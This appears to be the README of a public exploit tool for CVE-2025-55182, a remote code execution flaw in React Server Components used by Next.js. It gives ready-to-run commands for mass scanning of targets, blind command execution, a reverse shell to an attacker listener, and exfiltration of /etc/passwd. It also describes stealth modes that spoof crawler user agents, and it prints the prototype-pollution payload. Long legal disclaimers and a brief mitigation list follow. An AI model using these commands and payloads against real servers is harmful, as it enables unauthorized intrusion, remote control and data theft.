Share
## https://sploitus.com/exploit?id=5F8AB8DD-2DA9-5096-9EEA-655FE95004DF
# CVE-2025-55182-exp

## πŸ”₯ Overview

**CVE-2025-55182** is a critical Remote Code Execution (RCE) vulnerability in React Server Components (RSC) that affects Next.js applications using App Router with Server Actions. The vulnerability resides in the Flight protocol deserialization process, allowing attackers to execute arbitrary code through prototype pollution. ## ⚠️ Disclaimer / 

**FOR AUTHORIZED SECURITY TESTING ONLY**

This tool is provided for educational and authorized penetration testing purposes only. Unauthorized access to computer systems is illegal. **Any illegal or unauthorized use of this tool is solely the responsibility of the user. The author assumes no liability whatsoever.**

**。 γ€οΌŒοΌŒγ€‚ **

**Please read the full [DISCLAIMER.md](DISCLAIMER.md) before using this tool.**

By using this tool, you agree that:

- You have obtained proper authorization for any testing
- You will comply with all applicable laws and regulations
- You accept full responsibility for your actions
- The author bears no liability for any misuse

## πŸ“‹ Affected Versions

| Component | Affected Versions |
| ---------------------------- | ---------------------------------------- |
| `react-server-dom-webpack` | 19.0.0 - 19.2.0 |
| Next.js | 15.x, 16.x (App Router + Server Actions) |

## πŸ› οΈ Installation

```bash
# Clone the repository
git clone https://github.com/Spritualkb/CVE-2025-55182-exp.git
cd CVE-2025-55182-exp

# Install dependencies
pip install requests
pip install requests[socks] # For SOCKS5 proxy support
```

## πŸ“– Usage

### Check Single Target

```bash
python3 exploit.py http://target:3000 --check
```

### Batch Scan from File

```bash
# Basic batch scan
python3 exploit.py -f targets.txt --check

# With stealth mode and delay
python3 exploit.py -f targets.txt --check --stealth crawler --delay 2

# Save vulnerable targets to file
python3 exploit.py -f targets.txt --check -o vulnerable.txt
```

### Execute Command (Blind RCE)

```bash
python3 exploit.py http://target:3000 -c "id"
```

### Reverse Shell

```bash
# Start listener first
nc -lvnp 4444

# Execute reverse shell
python3 exploit.py http://target:3000 --revshell 10.0.0.1 4444
```

### Exfiltrate Command Output

```bash
# Start listener
nc -lvnp 4444

# Execute and exfiltrate output
python3 exploit.py http://target:3000 --exfil "cat /etc/passwd" 10.0.0.1 4444
```

### Using Proxy

```bash
python3 exploit.py http://target:3000 --check --proxy socks5://127.0.0.1:1080
```

## 🎭 Stealth Modes

| Mode | Description |
| ------------ | ------------------------------------------------------------ |
| `browser` | Mimics real browser requests (default) |

| `crawler` | Mimics search engine crawlers (Googlebot, Baiduspider, etc.) |
| `security` | Uses security scanner User-Agents |

## πŸ”§ Options

| Option | Description |
| ----------------------- | ------------------------------------------------ |
| `target` | Target URL (e.g., http://localhost:3000) |
| `-f, --file` | File containing target URLs (one per line) |
| `-o, --output` | Output file for vulnerable targets |
| `-c, --command` | Command to execute (blind) |
| `--check` | Check for vulnerability |
| `--proxy` | SOCKS5 proxy (e.g., socks5://127.0.0.1:1080) |
| `--stealth` | Stealth mode: browser, crawler, security |
| `--delay` | Delay between requests in seconds |
| `--variants` | Use multiple payload variants for thorough check |
| `--revshell IP PORT` | Reverse shell to IP:PORT |
| `--exfil CMD IP PORT` | Execute CMD and POST output to IP:PORT |
| `-t, --timeout` | Request timeout in seconds (default: 15) |

## πŸ”¬ Technical Details

### Vulnerability Mechanism

The exploit leverages prototype pollution in the Flight protocol deserialization:

1. **Prototype Pollution**: Pollutes `Object.prototype.then` via `"$1:__proto__:then"`
2. **Function Constructor Access**: Sets `_formData.get` to `Function` constructor via `"$1:constructor:constructor"`
3. **Code Injection**: Injects malicious code via `_prefix` that gets passed to `Function()`

### Payload Structure

```json
{
 "then": "$1:__proto__:then",
 "status": "resolved_model",
 "reason": -1,
 "value": "{\"then\":\"$B1337\"}",
 "_response": {
 "_prefix": "",
 "_chunks": "$Q2",
 "_formData": {"get": "$1:constructor:constructor"}
 }
}
```

## πŸ“ File Structure

```
CVE-2025-55182-exp/
β”œβ”€β”€ exploit.py # Main exploit script
β”œβ”€β”€ targets.txt # Target URLs list (one per line)
└── README.md # This file
```

## πŸ“ targets.txt Format

```
# Comments start with #
http://target1.com:3000
https://target2.com
target3.com:3000
```

## πŸ›‘οΈ Mitigation

1. **Update** to the latest patched versions of `react-server-dom-webpack` and Next.js
2. **Implement** input validation on Server Actions
3. **Use** Web Application Firewall (WAF) rules to detect malicious Flight protocol payloads
4. **Monitor** for unusual server-side errors (HTTP 500) with prototype-related messages

## πŸ“œ License

This project is licensed under the MIT License - see the [LICENSE](LICENSE) file for details. ---

# ⚠️ Legal Disclaimer / 

## English

### Terms of Use

By downloading, copying, installing, or using this software, you agree to be bound by the terms of this disclaimer. ### Intended Purpose

This tool is designed **exclusively** for:

### Authorized Penetration Testing
- Authorized penetration testing

### Security Research and Education
- Security research and education

### Vulnerability Assessment with Proper Authorization
- Vulnerability assessment with appropriate authorization

### CTF Competitions
- CTF (Capture The Flag) competitions

### Personal Lab Environments
- Personal lab environments

### Prohibited Use
You **SHALL NOT** use this tool for:
- Unauthorized access to computer systems
- Any illegal activities
- Attacking systems without explicit written permission
- Causing damage to any systems or data
- Any activities that violate local, state, national, or international laws

### No Warranty
This software is provided "as is" without any warranty of any kind, express or implied. The author(s) disclaim all warranties, including but not limited to:
- Merchantability
- Fitness for a particular purpose
- Non-infringement

### Limitation of Liability
In no event shall the author(s) be liable for any:
- Direct, indirect, incidental, special, exemplary, or consequential damages
- Loss of data, profits, or business opportunities
- Legal consequences arising from misuse of this tool

### User Responsibility
The user assumes **full responsibility** for:
- Obtaining proper authorization before testing any system
- Compliance with all applicable laws and regulations
- Any consequences resulting from the use of this tool
- Ensuring the legality of their actions in their jurisdiction

### Acknowledgment
By using this tool, you acknowledge that:
1. You have read and understood this disclaimer
2. You will use this tool only for legal and authorized purposes
3. You accept all risks associated with the use of this tool
4. The author(s) bear no responsibility for any misuse

---

## Chinese

### Terms of Use

Downloading, copying, installing, or using this software indicates your acceptance of these terms of disclaimer. ### Purpose

This tool is **only** intended for:
- Authorized penetration testing
- Security research and education
- Vulnerability assessment with proper authorization
- CTF (Capture The Flag) competitions
- Personal laboratory environments

### Prohibited Uses

You **must not** use this tool for:
- Unauthorized access to computer systems
- Any illegal activities
- Attacking systems without explicit written permission
- Causing damage to any systems or data
- Any activities that violate local, state, national, or international laws

### No Warranty

This software is provided "as is" without any warranty of any kind, express or implied. The author(s) disclaims all warranties, including but not limited to:
- Merchantability
- Fitness for a particular purpose
- Non-infringement

### Liability Limitations

In no event shall the author(s) be liable for any:
- Direct, indirect, incidental, special, exemplary, or consequential damages
- Loss of data, profits, or business opportunities
- Legal consequences arising from misuse of this tool

### User Responsibilities

The user assumes **full responsibility** for:
- Obtaining proper authorization before testing any system
- Compliance with all applicable laws and regulations
- Any consequences resulting from the use of this tool
- Ensuring the legality of their actions in their jurisdiction

### Acknowledgment

By using this tool, you acknowledge that:
1. You have read and understood this disclaimer
2. You will use this tool only for legal and authorized purposes
3. You accept all risks associated with the use of this tool
4. The author(s) bear no responsibility for any misuse

---

## Legal References

### Relevant Laws

- **China**: The Cybersecurity Law of the People’s Republic of China, Articles 285 and 286 of the Criminal Law of the People’s Republic of China
- **USA**: Computer Fraud and Abuse Act (CFAA), 18 U.S.C. Β§ 1030
- **EU**: Directive 2013/40/EU on attacks against information systems
- **UK**: Computer Misuse Act 1990

### Authorization Requirements

Before conducting any security testing, you must:
1. Obtain **written authorization** from the system owner
2. Clearly define the scope and boundaries of testing
3. Comply with all applicable laws and regulations
4. Document all testing activities

⚠️ Unauthorized computer access is illegal. ⚠️
⚠️ Unauthorized access to computers is a criminal offense. ⚠️